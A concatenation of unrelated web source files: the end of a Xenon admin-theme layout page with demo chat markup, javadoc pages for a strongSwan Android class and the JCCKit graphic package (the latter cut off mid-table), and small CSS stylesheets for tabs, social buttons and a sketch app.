<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-right-sidebar.html">
<img src="assets/images/layouts/layout-sidebar-right.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-right-sidebar.html">Right Sidebar</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-right-sidebar.html" class="">Fixed Sidebar</a>
</li>
<li>
<a href="layout-right-sidebar-static.html" class="">Static Sidebar</a>
</li>
<li>
<a href="layout-without-submenu-toggle-right.html" class="">Other Submenus Toggle Off</a>
</li>
</ul>
</div>
</div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-collapsed-sidebar.html">
<img src="assets/images/layouts/layout-sidebar-collapsed.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-collapsed-sidebar.html">Collapsed Sidebar</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-collapsed-sidebar.html" class="disabled">
<del>Fixed Sidebar</del>
</a>
</li>
<li>
<a href="layout-collapsed-sidebar.html" class="">Static Sidebar</a>
</li>
<li>
<a href="layout-chat-open.html" class="">Static Sidebar & Chat Open</a>
</li>
</ul>
</div>
</div>
<div class="clearfix"></div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-right-collapsed-sidebar.html">
<img src="assets/images/layouts/layout-sidebar-right-collapsed.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-right-collapsed-sidebar.html">Collapsed Right Sidebar</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-right-collapsed-sidebar.html" class="disabled">
<del>Fixed Sidebar</del>
</a>
</li>
<li>
<a href="layout-right-collapsed-sidebar.html" class="">Static Sidebar</a>
</li>
<li>
<a href="layout-right-collapsed-sidebar-chat-open.html" class="">Static Sidebar & Chat Open</a>
</li>
</ul>
</div>
</div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-horizontal-menu.html">
<img src="assets/images/layouts/layout-horizontal.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-horizontal-menu.html">Horizontal Menu</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-horizontal-menu.html" class="">Fixed to Top</a>
</li>
<li>
<a href="layout-horizontal-menu-static.html" class="">Static on Top</a>
</li>
<li>
<a href="layout-horizontal-menu-boxed.html" class="">Boxed Content with Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-menu-click-to-open-subs.html" class="">Click to Open Submenus</a>
</li>
<li>
<a href="layout-horizontal-menu-min.html" class="">Minimal Horizontal Menu</a>
</li>
</ul>
</div>
</div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-horizontal-plus-sidebar.html">
<img src="assets/images/layouts/layout-sidebar-horizontal.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-horizontal-plus-sidebar.html">Sidebar & Horizontal Menu</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-horizontal-plus-sidebar.html" class="">Fixed Sidebar & Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-sidebar-menu-static.html" class="">Static Sidebar & Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-fixed-sidebar-menu-static.html" class="">Static Sidebar, Fixed Horizontal Menu</a>
</li>
</ul>
</div>
</div>
<div class="clearfix"></div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-horizontal-right-sidebar-menu.html">
<img src="assets/images/layouts/layout-horizontal-right-sidebar.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-horizontal-right-sidebar-menu.html">Right Sidebar & Horizontal Menu</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-horizontal-right-sidebar-menu.html" class="">Fixed Sidebar & Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-right-sidebar-menu-static.html" class="">Static Sidebar & Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-right-fixed-sidebar-menu-static.html" class="">Static Sidebar, Fixed Horizontal Menu</a>
</li>
</ul>
</div>
</div>
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-horizontal-sidebar-menu-collapsed.html">
<img src="assets/images/layouts/layout-sidebar-collapsed-horizontal.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-horizontal-sidebar-menu-collapsed.html">Collapsed Sidebar & Horizontal Menu</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-horizontal-sidebar-menu-collapsed.html" class="">Static Sidebar & Fixed Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-static-sidebar-menu-collapsed.html" class="">Static Sidebar & Horizontal Menu</a>
</li>
</ul>
</div>
</div>
<div class="col-sm-4">
<div class="layout-variant layout-current">
<div class="layout-img">
<a href="layout-horizontal-sidebar-menu-collapsed-right.html">
<img src="assets/images/layouts/layout-horizontal-right-sidebar-collapsed.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-horizontal-sidebar-menu-collapsed-right.html">Right Collapsed Sidebar & Horizontal Menu</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-horizontal-sidebar-menu-collapsed-right.html" class="layout-mode-current">Static Sidebar & Fixed Horizontal Menu</a>
</li>
<li>
<a href="layout-horizontal-static-sidebar-menu-collapsed-right.html" class="">Static Sidebar & Horizontal Menu</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<!-- Main Footer -->
<!-- Choose between footer styles: "footer-type-1" or "footer-type-2" -->
<!-- Add class "sticky" to always stick the footer to the end of page (if page contents is small) -->
<!-- Or class "fixed" to always fix the footer to the end of page -->
<footer class="main-footer sticky footer-type-1">
<div class="footer-inner">
<!-- Add your copyright text here -->
<div class="footer-text">
© 2014
<strong>Xenon</strong>
theme by <a href="http://laborator.co" target="_blank">Laborator</a>
</div>
<!-- Go to Top Link, just add rel="go-top" to any link to add this functionality -->
<div class="go-up">
<a href="#" rel="go-top">
<i class="fa-angle-up"></i>
</a>
</div>
</div>
</footer>
</div>
<!-- start: Chat Section -->
<div id="chat" class="fixed">
<div class="chat-inner">
<h2 class="chat-header">
<a href="#" class="chat-close" data-toggle="chat">
<i class="fa-plus-circle rotate-45deg"></i>
</a>
Chat
<span class="badge badge-success is-hidden">0</span>
</h2>
<script type="text/javascript">
// Here is just a sample how to open chat conversation box
jQuery(document).ready(function($)
{
var $chat_conversation = $(".chat-conversation");
$(".chat-group a").on('click', function(ev)
{
ev.preventDefault();
$chat_conversation.toggleClass('is-open');
$(".chat-conversation textarea").trigger('autosize.resize').focus();
});
$(".conversation-close").on('click', function(ev)
{
ev.preventDefault();
$chat_conversation.removeClass('is-open');
});
});
</script>
<div class="chat-group">
<strong>Favorites</strong>
<a href="#"><span class="user-status is-online"></span> <em>Catherine J. Watkins</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Nicholas R. Walker</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Susan J. Best</em></a>
<a href="#"><span class="user-status is-idle"></span> <em>Fernando G. Olson</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Brandon S. Young</em></a>
</div>
<div class="chat-group">
<strong>Work</strong>
<a href="#"><span class="user-status is-busy"></span> <em>Rodrigo E. Lozano</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Robert J. Garcia</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Daniel A. Pena</em></a>
</div>
<div class="chat-group">
<strong>Other</strong>
<a href="#"><span class="user-status is-online"></span> <em>Dennis E. Johnson</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Stuart A. Shire</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Janet I. Matas</em></a>
<a href="#"><span class="user-status is-online"></span> <em>Mindy A. Smith</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Herman S. Foltz</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Gregory E. Robie</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>Nellie T. Foreman</em></a>
<a href="#"><span class="user-status is-busy"></span> <em>William R. Miller</em></a>
<a href="#"><span class="user-status is-idle"></span> <em>Vivian J. Hall</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Melinda A. Anderson</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Gary M. Mooneyham</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Robert C. Medina</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Dylan C. Bernal</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Marc P. Sanborn</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Kenneth M. Rochester</em></a>
<a href="#"><span class="user-status is-offline"></span> <em>Rachael D. Carpenter</em></a>
</div>
</div>
<!-- conversation template -->
<div class="chat-conversation">
<div class="conversation-header">
<a href="#" class="conversation-close">
×
</a>
<span class="user-status is-online"></span>
<span class="display-name">Arlind Nushi</span>
<small>Online</small>
</div>
<ul class="conversation-body">
<li>
<span class="user">Arlind Nushi</span>
<span class="time">09:00</span>
<p>Are you here?</p>
</li>
<li class="odd">
<span class="user">Brandon S. Young</span>
<span class="time">09:25</span>
<p>This message is pre-queued.</p>
</li>
<li>
<span class="user">Brandon S. Young</span>
<span class="time">09:26</span>
<p>Whohoo!</p>
</li>
<li class="odd">
<span class="user">Arlind Nushi</span>
<span class="time">09:27</span>
<p>Do you like it?</p>
</li>
</ul>
<div class="chat-textarea">
<textarea class="form-control autogrow" placeholder="Type your message"></textarea>
</div>
</div>
</div>
<!-- end: Chat Section -->
</div>
<!-- Bottom Scripts -->
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/TweenMax.min.js"></script>
<script src="assets/js/resizeable.js"></script>
<script src="assets/js/joinable.js"></script>
<script src="assets/js/xenon-api.js"></script>
<script src="assets/js/xenon-toggles.js"></script>
<!-- JavaScripts initializations and stuff -->
<script src="assets/js/xenon-custom.js"></script>
</body>
</html>
|
docs/org/strongswan/android/logic/imc/attributes/ProductInformationAttribute.html
|
ldelpri/strongProva
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_05) on Tue Sep 16 13:34:10 CEST 2014 -->
<title>ProductInformationAttribute</title>
<meta name="date" content="2014-09-16">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ProductInformationAttribute";
}
}
catch(err) {
}
//-->
var methods = {"i0":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../../org/strongswan/android/logic/imc/attributes/PrivateEnterpriseNumber.html" title="enum in org.strongswan.android.logic.imc.attributes"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../../org/strongswan/android/logic/imc/attributes/SettingsAttribute.html" title="class in org.strongswan.android.logic.imc.attributes"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/strongswan/android/logic/imc/attributes/ProductInformationAttribute.html" target="_top">Frames</a></li>
<li><a href="ProductInformationAttribute.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.strongswan.android.logic.imc.attributes</div>
<h2 title="Class ProductInformationAttribute" class="title">Class ProductInformationAttribute</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>org.strongswan.android.logic.imc.attributes.ProductInformationAttribute</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd><a href="../../../../../../org/strongswan/android/logic/imc/attributes/Attribute.html" title="interface in org.strongswan.android.logic.imc.attributes">Attribute</a></dd>
</dl>
<hr>
<br>
<pre>public class <span class="typeNameLabel">ProductInformationAttribute</span>
extends java.lang.Object
implements <a href="../../../../../../org/strongswan/android/logic/imc/attributes/Attribute.html" title="interface in org.strongswan.android.logic.imc.attributes">Attribute</a></pre>
<div class="block">PA-TNC Product Information attribute (see section 4.2.2 of RFC 5792)
1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Product Vendor ID | Product ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Product ID | Product Name (Variable Length) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../../../org/strongswan/android/logic/imc/attributes/ProductInformationAttribute.html#ProductInformationAttribute--">ProductInformationAttribute</a></span>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>byte[]</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../org/strongswan/android/logic/imc/attributes/ProductInformationAttribute.html#getEncoding--">getEncoding</a></span>()</code>
<div class="block">Returns the binary encoding of the attribute</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ProductInformationAttribute--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ProductInformationAttribute</h4>
<pre>public ProductInformationAttribute()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getEncoding--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>getEncoding</h4>
<pre>public byte[] getEncoding()</pre>
<div class="block"><span class="descfrmTypeLabel">Description copied from interface: <code><a href="../../../../../../org/strongswan/android/logic/imc/attributes/Attribute.html#getEncoding--">Attribute</a></code></span></div>
<div class="block">Returns the binary encoding of the attribute</div>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../../org/strongswan/android/logic/imc/attributes/Attribute.html#getEncoding--">getEncoding</a></code> in interface <code><a href="../../../../../../org/strongswan/android/logic/imc/attributes/Attribute.html" title="interface in org.strongswan.android.logic.imc.attributes">Attribute</a></code></dd>
<dt><span class="returnLabel">Returns:</span></dt>
<dd>binary encoding</dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../../org/strongswan/android/logic/imc/attributes/PrivateEnterpriseNumber.html" title="enum in org.strongswan.android.logic.imc.attributes"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../../org/strongswan/android/logic/imc/attributes/SettingsAttribute.html" title="class in org.strongswan.android.logic.imc.attributes"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/strongswan/android/logic/imc/attributes/ProductInformationAttribute.html" target="_top">Frames</a></li>
<li><a href="ProductInformationAttribute.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
library/tabber/tab-css2.css
|
jdenoy/daloradius
|
/* $Id: example.css,v 1.5 2006/03/27 02:44:36 pat Exp $ */
/*--------------------------------------------------
REQUIRED to hide the non-active tab content.
But do not hide them in the print stylesheet!
--------------------------------------------------*/
.tabberlive .tabbertabhide {
display:none;
}
/*--------------------------------------------------
.tabber = before the tabber interface is set up
.tabberlive = after the tabber interface is set up
--------------------------------------------------*/
.tabber {
}
.tabberlive {
margin-top:1em;
/* border-color: #0000FF; */
/* border-style: solid; */
}
/*--------------------------------------------------
ul.tabbernav = the tab navigation list
li.tabberactive = the active tab
--------------------------------------------------*/
ul.tabbernav
{
margin: 0;
padding: 0;
height: 3px;
font: 11px Verdana, sans-serif;
width: 95%;
/*border-bottom: 5px solid #bbb;*/
border-bottom: 1px solid green;
list-style-type: none;
//background: #e9f9ac;
}
ul.tabbernav li
{
float: left;
display: block;
color: #0000FF;
}
ul.tabbernav li a
{
background: #E9F9AC;
color: #555;
text-decoration: none;
padding: 0px 5px 3px 5px;
display: block;
color: #0000FF;
border-bottom: 3px solid #E9F9AC;
}
ul.tabbernav li a:link { color: #000; }
ul.tabbernav li a:visited { color: #667; }
ul.tabbernav li a:hover
{
font-weight: bold;
color: #000;
cursor: pointer;
}
ul.tabbernav li.tabberactive a {
color: #000;
cursor: default;
font-weight: bold;
border-bottom: 3px solid #E9F9AC;
background: #CEE574;
}
ul.tabbernav li.tabberactive a:hover {
// border-bottom: 3px solid #f90;
}
/*--------------------------------------------------
.tabbertab = the tab content
Add style only after the tabber interface is set up (.tabberlive)
--------------------------------------------------*/
.tabberlive .tabbertab {
/* uncomment below to enable the box border for the tabbed divs
padding:5px;
border:1px solid #aaa;
border-top:1;
*/
}
|
contact_social.css
|
peteainsworth/contact_social
|
#contact_social {
cursor: pointer;
overflow: hidden;
position: fixed;
text-decoration: none !important;
z-index: 9999;
}
#contact_social a {
display: block;
margin-bottom:6px;
overflow:hidden;
background-image: url(contact_social.png);
background-repeat:no-repeat;
background-color:transparent;
}
#contact_social a.contact-social-twitter {
background-position: 0 0;
}
#contact_social a.contact-social-facebook {
background-position: 0 -35px;
}
#contact_social a.contact-social-contact-us {
background-position: 0 -70px;
}
#contact_social a.contact-social-twitter:hover {
background-position: -35px 0;
}
#contact_social a.contact-social-facebook:hover {
background-position: -35px -35px;
}
#contact_social a.contact-social-contact-us:hover {
background-position: -35px -70px;
}
#contact_social img {
border: none;
}
.contact_social-left {
left: 0px;
}
.contact_social-right {
right: 0px;
}
|
SketchApp/index.css
|
danelkhen/sketchapp
|
svg
{
/*border:solid 1px gray;*/
}
path,rect,circle{
fill:white;
stroke:black;
}
.Room{
fill:#F2D6AB;
}
.Wall
{
stroke-width:10px;
}
.OuterWall
{
stroke-width:25px;
}
.Selected {
stroke:red;
stroke-width:3px;
}
image.Selected
{
outline:auto;
}
.FoldoutSofa
{
fill:gray;
}
.FoldoutSofaOpened
{
fill:transparent;
}
|
lagarto/lagarto-max/www/JCCKit/docs/WebSite/apidoc/jcckit/graphic/package-use.html
|
ekoeppen/panstamp-python
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.4.2_03) on Wed Jan 05 18:27:29 CET 2005 -->
<TITLE>
Uses of Package jcckit.graphic (JCCKit)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="Uses of Package jcckit.graphic (JCCKit)";
}
</SCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../index.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Package<br>jcckit.graphic</B></H2>
</CENTER>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Packages that use <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#jcckit"><B>jcckit</B></A></TD>
<TD>Application and applet classes for immediate use. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#jcckit.graphic"><B>jcckit.graphic</B></A></TD>
<TD>Classes for representing a plot or a chart in device independent coordinates. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#jcckit.plot"><B>jcckit.plot</B></A></TD>
<TD>Classes for generating plots and charts. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#jcckit.renderer"><B>jcckit.renderer</B></A></TD>
<TD>Renderer classes. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#jcckit.transformation"><B>jcckit.transformation</B></A></TD>
<TD>Classes for the transformations between data coordinates into device-independent
coordinates. </TD>
</TR>
</TABLE>
<P>
<A NAME="jcckit"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Classes in <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A> used by <A HREF="../../jcckit/package-summary.html">jcckit</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphicalElement.html#jcckit"><B>GraphicalElement</B></A></B>
<BR>
Interface all graphical elements have to implement.
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/GraphPoint.html#jcckit"><B>GraphPoint</B></A></B>
<BR>
Immutable class of a two-dimensional point in the device-independent
coordinate system.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Renderer.html#jcckit"><B>Renderer</B></A></B>
<BR>
Marker interface. </TD>
</TR>
</TABLE>
<P>
<A NAME="jcckit.graphic"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
Classes in <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A> used by <A HREF="../../jcckit/graphic/package-summary.html">jcckit.graphic</A></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><B><A HREF="../../jcckit/graphic/class-use/Anchor.html#jcckit.graphic"><B>Anchor</B></A></B>
<BR>
Anchor of a graphical element. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
